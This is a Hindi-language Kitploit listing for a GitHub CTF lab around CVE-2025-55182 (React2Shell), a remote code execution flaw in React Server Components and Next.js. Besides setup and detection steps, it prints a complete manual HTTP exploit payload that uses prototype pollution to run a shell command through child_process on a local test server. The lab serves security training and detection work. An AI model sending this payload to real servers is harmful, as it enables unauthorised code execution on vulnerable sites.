Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/goultarde/cve-2025-55182-react2shell-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षालैब और अभ्यास
GitHubgoultarde/cve-2025-55182-react2shell-lab

CVE-2025-55182-React2Shell-Lab

CVE-2025-55182 (React Server Components में RCE) का शोषण करने वाला CTF लैब वातावरण, जिसमें असुरक्षित Next.js ब्लॉग, डिटेक्शन स्क्रिप्ट्स, और व्यावहारिक सुरक्षा प्रशिक्षण हेतु मैनुअल एक्सप्लॉइट पेलोड्स शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

CyberSec Blog CTF - React2Shell PoC

यह रिपॉजिटरी Next.js और React Server Components का उपयोग करने वाले एक साइबर सुरक्षा ब्लॉग पर आधारित एक कमजोर CTF (Capture The Flag) वातावरण प्रदान करती है।

CVE-2025-55182 : React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1 और 19.2.0 में प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी। कमजोर कोड Server Function एंडपॉइंट्स को भेजे गए HTTP अनुरोधों के पेलोड को असुरक्षित रूप से डी-सीरियलाइज़ करता है।

CVE-2025-66478 : App Router का उपयोग करने वाले Next.js अनुप्रयोगों पर प्रभाव।


CTF का विवरण

यह चैलेंज एक साइबर सुरक्षा ब्लॉग प्रस्तुत करता है जिसमें शामिल हैं:

  • सुरक्षा विषयों पर 5 लेख (Web, React, CTF, Next.js, डी-सीरियलाइज़ेशन)
  • 3 काल्पनिक लेखक
  • डार्क मोड के साथ एक आधुनिक इंटरफ़ेस

ब्लॉग React और Next.js के कमजोर संस्करणों का उपयोग करता है, जिससे React2Shell कमजोरी का शोषण संभव होता है।

उपयोग किए गए कमजोर संस्करण

पैकेजसंस्करण
next16.0.6
react19.2.0
react-dom19.2.0

CTF कैसे चलाएं

Docker के साथ (अनुशंसित)

root@kitploit:~
# Construire l'image
docker build -t react2shell-poc .

# Lancer le conteneur
docker run --rm -p 127.0.0.1:3000:3000 react2shell-poc

Docker के बिना

root@kitploit:~
npm install
npm run build
npm run start

फिर, http://127.0.0.1:3000 पर जाएं

कमजोरी का पता कैसे लगाएं

AssetNote स्कैनर के साथ

root@kitploit:~
git clone https://github.com/assetnote/react2shell-scanner && cd react2shell-scanner
virtualenv venv && source venv/bin/activate && pip install -r requirements.txt

python3 scanner.py -u http://127.0.0.1:3000

Nuclei के साथ

root@kitploit:~
nuclei -t ./nuclei-template/CVE-2025-55182.yaml -u http://127.0.0.1:3000

शोषण कैसे करें

React2Shell टूल के साथ

Python एक्सप्लॉइट के लिए React2Shell/ फ़ोल्डर देखें।

मैनुअल HTTP पेलोड

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

प्रतिक्रिया के x-action-redirect हेडर में id कमांड का परिणाम मौजूद होगा।

संदर्भ

  • सुरक्षा सलाह: React Server Components और Next.js में गंभीर RCE कमजोरियाँ
  • CVE-2025-55182 - NVD
  • CVE-2025-66478 - Next.js सुरक्षा सलाह
  • React2Shell Scanner - AssetNote

simple-nextjs-blog टेम्पलेट और कमजोर CVE-2025-55182 वातावरण पर आधारित कस्टम CTF चैलेंज।

टूल डाउनलोड करें